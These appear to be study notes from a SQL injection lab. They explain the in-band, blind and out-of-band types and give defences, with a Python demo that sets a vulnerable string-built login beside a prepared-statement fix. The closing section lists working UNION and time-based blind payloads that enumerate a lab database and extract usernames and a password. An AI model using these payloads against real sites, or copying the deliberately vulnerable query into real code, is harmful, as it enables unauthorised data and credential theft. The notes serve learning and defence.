Different types of SQL Injection
In-Band SQLi
The easiest type to detect and exploit. Data from the database is returned on the same website (the same channel that was used to inject).
Error-Based SQLi
Error messages from the database reveal information about its structure.
Union-Based SQLi
Exploits the UNION operator combined with a SELECT statement.
Blind SQLi
Little or no feedback from the queries is returned to the attacker.
Boolean based SQLi
Sometimes only a true/false response can be exploited, e.g. whether a username exists.
Time based SQLi
Exploits sleep() in the sent queries. When there is no visual indicator in the response, the time it takes to respond shows whether the injected condition was true.
Out-of-Band SQLi
Data flows hacker -> website -> db -> back to the hacker with the requested data over a different channel, using the HTTP or DNS protocol.
Terms
information_schema - contains information about every database and table. Every user has access to this.
How to protect against SQLi
- Prepared Statements - parameters are bound into placeholders in a query that has already been prepared, so user input is handled as data, not as SQL
- Input Validation - disallow some characters like ' or --, or better, allow only certain strings (an allowlist)
- Escaping User Input - characters like $ ' " are prefixed with \ so that they are treated as regular string characters instead of SQL syntax
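Added example, not from the room or the original notes: the string-built login query beside its prepared-statement replacement and an allowlist validator, using Python's sqlite3 with a constructed users table. The page's "return true" payload is used without the trailing ';' because sqlite3 runs one statement per call (SLEEP() and database() are MySQL-specific and are not shown).

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a 'users' table (sample data, not the room's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "hunter2"), ("bob", "letmein")])
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into the query, so input is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_prepared(conn, username, password):
    """Prepared statement: the '?' placeholders are bound as data, never as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Input validation as an allowlist: only letters, digits and underscore.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def is_valid_username(username):
    """True only when the whole string matches the allowlist pattern."""
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"                            # always-true condition
    print(login_vulnerable(db, payload, "anything"))  # admin (bypassed)
    print(login_prepared(db, payload, "anything"))    # None (rejected)
    print(is_valid_username(payload))                 # False
```

The vulnerable query becomes `... WHERE username = '' OR 1=1--' AND password = ...`, so the password check is commented out; the prepared version compares the literal string and finds no such user.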
Examples
Database name
0 UNION SELECT 1,2,database()
Database tables
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
using a separator
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
return true (always-true condition)
' OR 1=1;--
Time-based attacks
Table Schema
admin123' UNION SELECT SLEEP(1),2 where database() like 'sqli_four';--
Table Name
admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.TABLES WHERE table_schema = 'sqli_four' and table_name like '%';--
admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.TABLES WHERE table_schema = 'sqli_four' and table_name like '%' and table_name!='users' and table_name!='analytics_referrers';--
Column names (table analytics_referrers)
admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='analytics_referrers' and COLUMN_NAME='id';--
admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='analytics_referrers' and COLUMN_NAME like 'domain' and COLUMN_NAME !='id';--
Column names (table users)
admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='users' and COLUMN_NAME like '%';--
admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='users' and COLUMN_NAME like '%' and column_name != 'password' and column_name != 'id' and column_name != 'username';--
username and password:
admin123' UNION SELECT SLEEP(1), 2 from analytics_referrers where id like '%';--
<< NONE
admin123' UNION SELECT SLEEP(1), 2 from analytics_referrers where domain like '%';--
<< NONE
admin123' UNION SELECT SLEEP(1), 2 from users where username like '%';--
<< admin
https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(1), 2 from users where username='admin' and password like '%';--
<< 4961